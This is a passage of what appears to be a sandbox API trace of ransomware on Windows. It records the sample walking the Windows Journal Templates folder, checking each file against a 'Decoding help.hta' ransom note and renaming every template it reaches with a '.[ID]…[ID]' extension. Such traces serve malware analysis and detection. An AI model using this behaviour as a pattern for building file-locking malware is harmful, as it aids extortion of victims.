lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\blank.jtp") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\blank.jtp" [0041.299] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\blank.jtp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\blank.jtp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\blank.jtp.[ID]g9uZrLhJaygpwRm1[ID]" [0041.299] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\blank.jtp" (normalized: "c:\\program files\\windows journal\\templates\\blank.jtp"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\blank.jtp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows journal\\templates\\blank.jtp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.308] FindNextFileW (in: hFindFile=0x5d8150, lpFindFileData=0x908fd30 | out: lpFindFileData=0x908fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5597007, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5597007, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x46ca8869, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2ce6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dotted_Line.jtp", cAlternateFileName="")) returned 1 [0041.308] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" [0041.308] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned 50 [0041.308] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta" [0041.308] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta" (normalized: "c:\\program files\\windows journal\\templates\\decoding help.hta")) returned 0x1 [0041.308] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Dotted_Line.jtp") returned -1 [0041.308] lstrlenW (lpString="Dotted_Line.jtp") returned 15 [0041.308] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" [0041.308] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned 50 [0041.308] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\", lpString2="Dotted_Line.jtp" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp" [0041.308] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp" [0041.308] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp.[ID]g9uZrLhJaygpwRm1[ID]" [0041.308] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp" (normalized: "c:\\program files\\windows journal\\templates\\dotted_line.jtp"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows journal\\templates\\dotted_line.jtp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.308] FindNextFileW (in: hFindFile=0x5d8150, lpFindFileData=0x908fd30 | out: lpFindFileData=0x908fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc55bd164, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc55bd164, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x470d2eb1, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x361c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Genko_1.jtp", cAlternateFileName="")) returned 1 [0041.308] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" [0041.308] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned 50 [0041.309] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta" [0041.309] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta" (normalized: "c:\\program files\\windows journal\\templates\\decoding help.hta")) returned 0x1 [0041.309] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Genko_1.jtp") returned -1 [0041.309] lstrlenW (lpString="Genko_1.jtp") returned 11 [0041.309] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" [0041.309] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned 50 [0041.309] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\", lpString2="Genko_1.jtp" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp" [0041.309] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp" [0041.309] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp.[ID]g9uZrLhJaygpwRm1[ID]" [0041.309] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp" (normalized: "c:\\program files\\windows journal\\templates\\genko_1.jtp"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows journal\\templates\\genko_1.jtp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.317] FindNextFileW (in: hFindFile=0x5d8150, lpFindFileData=0x908fd30 | out: lpFindFileData=0x908fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc560941e, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc560941e, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x47191587, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x4c8c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Genko_2.jtp", cAlternateFileName="")) returned 1 [0041.317] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" [0041.318] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned 50 [0041.318] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta" [0041.318] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta" (normalized: "c:\\program files\\windows journal\\templates\\decoding help.hta")) returned 0x1 [0041.318] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Genko_2.jtp") returned -1 [0041.318] lstrlenW (lpString="Genko_2.jtp") returned 11 [0041.318] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" [0041.318] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned 50 [0041.318] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\", lpString2="Genko_2.jtp" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp" [0041.318] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp" [0041.318] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp.[ID]g9uZrLhJaygpwRm1[ID]" [0041.318] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp" (normalized: "c:\\program files\\windows journal\\templates\\genko_2.jtp"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows journal\\templates\\genko_2.jtp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.318] FindNextFileW (in: hFindFile=0x5d8150, lpFindFileData=0x908fd30 | out: lpFindFileData=0x908fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc562f57b, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc562f57b, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x476ec6bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1e15c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Graph.jtp", cAlternateFileName="")) returned 1 [0041.318] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" [0041.318] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned 50 [0041.318] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta" [0041.318] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta" (normalized: "c:\\program files\\windows journal\\templates\\decoding help.hta")) returned 0x1 [0041.318] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Graph.jtp") returned -1 [0041.318] lstrlenW (lpString="Graph.jtp") returned 9 [0041.318] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" [0041.318] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned 50 [0041.318] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\", lpString2="Graph.jtp" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Graph.jtp") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Graph.jtp" [0041.318] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Graph.jtp" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Graph.jtp") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Graph.jtp" [0041.318] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Graph.jtp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Graph.jtp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Graph.jtp.[ID]g9uZrLhJaygpwRm1[ID]" [0041.319] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Graph.jtp" (normalized: "c:\\program files\\windows journal\\templates\\graph.jtp"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Graph.jtp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows journal\\templates\\graph.jtp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.323] FindNextFileW (in: hFindFile=0x5d8150, lpFindFileData=0x908fd30 | out: lpFindFileData=0x908fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc567b835, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc567b835, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x47784c37, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x26f6e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Memo.jtp", cAlternateFileName="")) returned 1 [0041.324] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" [0041.324] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned 50 [0041.324] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta" [0041.324] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta" (normalized: "c:\\program files\\windows journal\\templates\\decoding help.hta")) returned 0x1 [0041.324] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Memo.jtp") returned -1 [0041.324] lstrlenW (lpString="Memo.jtp") returned 8 [0041.324] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" [0041.324] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned 50 [0041.324] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\", lpString2="Memo.jtp" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp" [0041.324] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp" [0041.324] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp.[ID]g9uZrLhJaygpwRm1[ID]" [0041.324] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp" (normalized: "c:\\program files\\windows journal\\templates\\memo.jtp"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows journal\\templates\\memo.jtp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.330] FindNextFileW (in: hFindFile=0x5d8150, lpFindFileData=0x908fd30 | out: lpFindFileData=0x908fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc56a1992, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc56a1992, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x47ea8dd7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x275c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Month_Calendar.jtp", cAlternateFileName="")) returned 1 [0041.330] lstrcpyW (in: lpString1=0x11077800, lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" [0041.330] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned 50 [0041.330] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta" [0041.330] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta" (normalized: "c:\\program files\\windows journal\\templates\\decoding help.hta")) returned 0x1 [0041.330] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Month_Calendar.jtp") returned -1 [0041.330] lstrlenW (lpString="Month_Calendar.jtp") returned 18 [0041.330] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" [0041.330] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned 50 [0041.330] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\", lpString2="Month_Calendar.jtp" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp" [0041.330] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp" [0041.330] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp.[ID]g9uZrLhJaygpwRm1[ID]" [0041.330] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp" (normalized: "c:\\program files\\windows journal\\templates\\month_calendar.jtp"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows journal\\templates\\month_calendar.jtp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.331] FindNextFileW (in: hFindFile=0x5d8150, lpFindFileData=0x908fd30 | out: lpFindFileData=0x908fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc56c7aef, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc56c7aef, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x47f4134f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x9f58, dwReserved0=0x0, dwReserved1=0x0, cFileName="Music.jtp", cAlternateFileName="")) returned 1 [0041.331] lstrcpyW (in: lpString1=0x11077800, lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" [0041.331] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned 50 [0041.331] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta" [0041.331] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta" (normalized: "c:\\program files\\windows journal\\templates\\decoding help.hta")) returned 0x1 [0041.331] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Music.jtp") returned -1 [0041.331] lstrlenW (lpString="Music.jtp") returned 9 [0041.331] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" [0041.331] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned 50 [0041.331] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\", lpString2="Music.jtp" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Music.jtp") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Music.jtp" [0041.331] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Music.jtp" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Music.jtp") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Music.jtp" [0041.331] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Music.jtp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Music.jtp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Music.jtp.[ID]g9uZrLhJaygpwRm1[ID]" [0041.331] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Music.jtp" (normalized: "c:\\program files\\windows journal\\templates\\music.jtp"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Music.jtp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows journal\\templates\\music.jtp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.331] FindNextFileW (in: hFindFile=0x5d8150, lpFindFileData=0x908fd30 | out: lpFindFileData=0x908fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc56edc4c, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc56edc4c, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x47f4134f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xa95a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Seyes.jtp", cAlternateFileName="")) returned 1 [0041.331] lstrcpyW (in: lpString1=0x11077800, lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" [0041.331] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned 50 [0041.331] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta" [0041.331] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta" (normalized: "c:\\program files\\windows journal\\templates\\decoding help.hta")) returned 0x1 [0041.332] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Seyes.jtp") returned -1 [0041.332] lstrlenW (lpString="Seyes.jtp") returned 9 [0041.332] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" [0041.332] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned 50 [0041.332] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\", lpString2="Seyes.jtp" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp" [0041.332] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp" [0041.332] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp.[ID]g9uZrLhJaygpwRm1[ID]" [0041.332] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp" (normalized: "c:\\program files\\windows journal\\templates\\seyes.jtp"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows 